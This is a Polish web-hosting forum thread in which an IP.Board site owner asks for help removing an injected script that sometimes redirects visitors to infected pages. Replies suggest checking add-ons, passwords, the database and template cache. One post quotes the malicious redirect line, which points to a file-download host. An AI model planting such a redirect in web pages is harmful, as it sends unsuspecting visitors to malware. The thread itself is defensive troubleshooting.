Skocz do zawartości

Polecane posty

Na wstępie przepraszam, ze piszę w tym dziale, ale moj problem wynika bardziej z niewiedzy na temat obsługi SSH niż samego problemu. Do rzeczy:
Chodzi o stronę ansriskos.pl (skrypt IPB)
Gdy w google wpiszę Andriskos i w wynikach wyszukiwania klikam na moja strone to przenosi mnie na zarazone strony. Dzieje sie to raz na jakis czas zatem dodatkowo zapisywane jest cookie na hdd.
Identyczny problem jest opisany na stronie
http://peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/
niestety ja nie potrafię biegle posługiwać sie konsolą aby to usunąć.
Bardziej kumaty znajomy bawil sie programem typu TCP Stream i oto co napisal:

Czesc Adam,
jak slusznie zauwazyles, czasami dochodzi do nietypowego przekierowania na wspomniana przez Ciebie strone. Akcja ta jest wywolana przez nastepujacy kawalek kodu:
document.location='http://filestore321.com/download.php?id=1838a21b'
ktory zostaje wywolany przez nastepujacy skrypt, ktory znajduje sie w kodzie HTML Twojego forum:
http://andriskos.pl/index.php?ipbv=88bccbcc506fb400a715f734602a0b0e&g=js
Wygląda na to, ze to właśnie plik index.php zawiera zlosliwy kod wywołujący przekierowanie. Jeśli tam nie znajdziesz źródła problemu, sprawdź tez plik konfiguracyjny serwera (.htaccess w przypadku Apache)

 

 

W index / .htaccess nic nie ma.
Czy znajdzie się dobra dusza, która pomoże odsyfić forum ? Podejrzewam, że wykonanie kroków z pierwszego linka oraz z postów pod wpisem załatwiło by sprawę.
Dodam, że to jakaś grubsza sprawa bo po wrzucenie świeżych plików z oficjalnej strony IPB przez chwile jest ok a po około 2 dniach jest to samo.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nic nie sugeruję ,że tak jest w tym wypadku , ale częstym powodem podobnych problemów jest instalowanie dodatków ze zródeł niekoniecznie oficjalnych że tak się wyrażę.

 

Polecam dwa polskie dedykowane fora o ipb gdzie masz szanse uzyskać konstruktywną pomoc.

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

@metrowy

o lewiznach nie ma mowy. Na ipb forum i owszem... ale za $ a mnie nie stac aby placic ze skromnej renty socjalnej.

 

@pedro

Na ftp czysto. Nie ma tam tez innych domen. No i po infekcji wgralem czyste pliki z oficjalnej paczki

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Chodzi mi o konto ftp. Próbowałeś zmienić hasło i czyścić? Ewentualnie faktycznie jakiś dodatek.

 

tak, hasla do DB, DA. FTP.....wszystko zmienione.

Zapytam wprost: Czy ktoś z Was będzie na tyle uprzejmy i wejdzie w konsole zerknie / przejdzie po kolei kroki z pierwszego linka?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Jeśli syf siedzi to w bazie lub plikach. Innej możliwości raczej nie widzę. Dziurawy serwer ewentualnie...ale tu juz byle pikus sie nie wlamie. Kwesta znalezienia i usunięcia zarażonych wpisów.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Wygeneruj pliki stylu ponownie(w panelu admina) i zrób upgrade IPB. W moim przypadku pomogło jak miałem niedawno to samo. Generalnie to badziewie siedzi w plikach cache

 

//edit

Skiny & Języki -> Narzędzia szablonów i odbuduj szablon.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×